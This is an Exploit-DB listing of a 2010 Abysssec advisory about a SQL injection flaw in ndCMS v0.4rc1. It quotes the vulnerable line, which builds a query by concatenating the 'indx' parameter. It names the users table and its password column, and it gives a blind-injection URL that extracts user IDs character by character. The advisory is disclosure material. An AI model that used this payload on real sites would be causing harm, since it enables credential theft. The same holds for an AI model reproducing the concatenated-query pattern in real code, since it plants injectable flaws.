ndCMS - SQL Injection

Author: Abysssec
type: webapps
platform: asp
port: 
date_added: 2010-09-27  
date_updated: 2010-09-27  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 15124.txt  
'''
  __  __  ____         _    _ ____
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub-27-ndcms-sql-injection-vulnerability/

'''



Abysssec Inc Public Advisory


  Title            :  ndCMS Sql Injection Vulnerability
  Affected Version :  ndCMS(Nickel and Dime CMS) v0.4rc1
  Discovery        :  www.abysssec.com
  Download Links   :  http://souurceforge.net/projects/ndcms-net
  Login Page       :  http://localhost/ndcms/admin/?Mode=Express&indx=

Description :
===========================================================================================
  This version of ndCMS has Sql Injection Vulnerability that its DataBase is Access
  with  Table of Users   : tblUSERS
                 Columns : userid , passwd.


  Vulnerable Code:
         .../express_edit/editor.aspx
  Ln 65:
         dbr = db.ExecuteReader("Select * from tblPAGES WHERE indx=" + Request.Params["indx"]);


   Considering to the code, for example you can browse this URL:

         http://Example.com/express_edit/editor.aspx?index=1+AND+1=IIF((select mid(last(userid),1,1) from (select top 1 userid from tblUSERS))='a',1,2)

   and so on.


===========================================================================================